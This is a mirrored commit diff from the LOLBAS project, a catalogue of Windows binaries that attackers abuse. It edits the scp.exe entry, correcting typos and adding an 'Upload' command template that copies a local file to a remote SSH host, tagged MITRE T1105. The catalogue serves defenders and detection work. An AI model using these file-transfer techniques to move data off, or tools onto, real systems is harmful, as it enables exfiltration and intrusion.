mirror of
https://github.com/LOLBAS-Project/LOLBAS
synced 2024-12-28 15:58:24 +01:00
Update scp.yml
Added upload functionality
This commit is contained in:
parent
613afe8ef5
commit
354553efa3
@ -12,12 +12,19 @@ Commands:
|
|||||||
MitreID: T1202
|
MitreID: T1202
|
||||||
OperatingSystem: Windows 10, Windows 11
|
OperatingSystem: Windows 10, Windows 11
|
||||||
- Command: "scp <ssh-username>@192.168.187.128:<path_of_file_to_download> <path_to_save_file>"
|
- Command: "scp <ssh-username>@192.168.187.128:<path_of_file_to_download> <path_to_save_file>"
|
||||||
Description: Download file with scp.exe from am SSH server
|
Description: Download file with scp.exe from an SSH server
|
||||||
Usecase: Use scp.exe to download file from an SSH server. If needed, you will be asked to submit a password as well.
|
Usecase: Use scp.exe to download file from an SSH server. If needed, you will be asked to submit a password for the SSH session.
|
||||||
Category: Download
|
Category: Download
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1105
|
MitreID: T1105
|
||||||
OperatingSystem: Windows 10, Windows 11
|
OperatingSystem: Windows 10, Windows 11
|
||||||
|
- Command: "scp <path_of_local_file_to_upload> <ssh-username>@192.168.187.128:<path_to_save_file>"
|
||||||
|
Description: Upload file with scp.exe to an SSH server
|
||||||
|
Usecase: Use scp.exe to Upload file from the local machine to remote SSH server. If needed, you will be asked to submit a password for the SSH session.
|
||||||
|
Category: Upload
|
||||||
|
Privileges: User
|
||||||
|
MitreID: T1105
|
||||||
|
OperatingSystem: Windows 10, Windows 11
|
||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: c:\windows\system32\OpenSSH\scp.exe
|
- Path: c:\windows\system32\OpenSSH\scp.exe
|
||||||
Detection:
|
Detection:
|
||||||
|
Loading…
Reference in New Issue
Block a user